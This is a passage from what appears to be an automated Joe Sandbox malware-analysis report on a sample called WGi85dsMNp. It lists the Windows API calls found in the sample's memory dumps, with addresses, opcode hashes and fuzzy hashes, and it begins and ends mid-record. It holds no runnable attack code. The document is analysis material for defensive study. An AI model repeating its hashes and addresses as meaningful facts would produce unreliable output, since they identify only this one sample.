                                                                                                      • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                      APIs
                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1375471231-0
                                                                                                      • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                      • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                      • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                      • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(00000000), ref: 6F942B6B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 0970414ec9a9ca36f9954a75826dcee6b4028f566428a93ebaae6775f48dd15e
                                                                                                      • Instruction ID: ba70929aa8cc3ef2689696ce45a93e1c858103ef4c4fa10fe2e28d9f18aab3c5
                                                                                                      • Opcode Fuzzy Hash: 0970414ec9a9ca36f9954a75826dcee6b4028f566428a93ebaae6775f48dd15e
                                                                                                      • Instruction Fuzzy Hash: B84164B5804704DFEB34EFA8D9417593768FB36368F204856E908DA1C1D734E899CFA1
                                                                                                      APIs
                                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileMove
                                                                                                      • String ID:
                                                                                                      • API String ID: 3562171763-0
                                                                                                      • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                      • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                      • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                      • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointerwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 327478801-0
                                                                                                      • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                      • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                      • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                      • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                      APIs
                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                      • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                      • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                      • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                      • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                      APIs
                                                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00410444,0040CED0,004033DE,0040CED0,00410444,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                      • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                      • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(6F94505C,00000004,00000040,6F94504C), ref: 6F9429B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 131d92b9e20db265b3c46453d70425af78a94c244efbac9fe5cb1cdc865c6135
                                                                                                      • Instruction ID: e54cd6725c034cc5d81275ec14dc7766ccad7f6933310e0c89af6dbdd5c0bfaa
                                                                                                      • Opcode Fuzzy Hash: 131d92b9e20db265b3c46453d70425af78a94c244efbac9fe5cb1cdc865c6135
                                                                                                      • Instruction Fuzzy Hash: 5CF0A5F8508A84DEEB64EFAC84447193BE0B77B324B10452AE24CD6280E334846CCF91
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID:
                                                                                                      • API String ID: 71445658-0
                                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                      • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                      • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 973152223-0
                                                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                      • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                      • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                      • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                      • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                        • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                      • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                      • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                      • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                      • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                      • EmptyClipboard.USER32 ref: 004058B7
                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                      • CloseClipboard.USER32 ref: 00405912
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                      • String ID: (7B${
                                                                                                      • API String ID: 590372296-525222780
                                                                                                      • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                      • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                      • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                      • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                      • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                        • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                        • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                        • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                        • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                        • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                      • String ID: (7B$A$Call
                                                                                                      • API String ID: 2624150263-413618503
                                                                                                      • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                      • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                      • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                      • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Iw\Unnumberable, xrefs: 004021C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
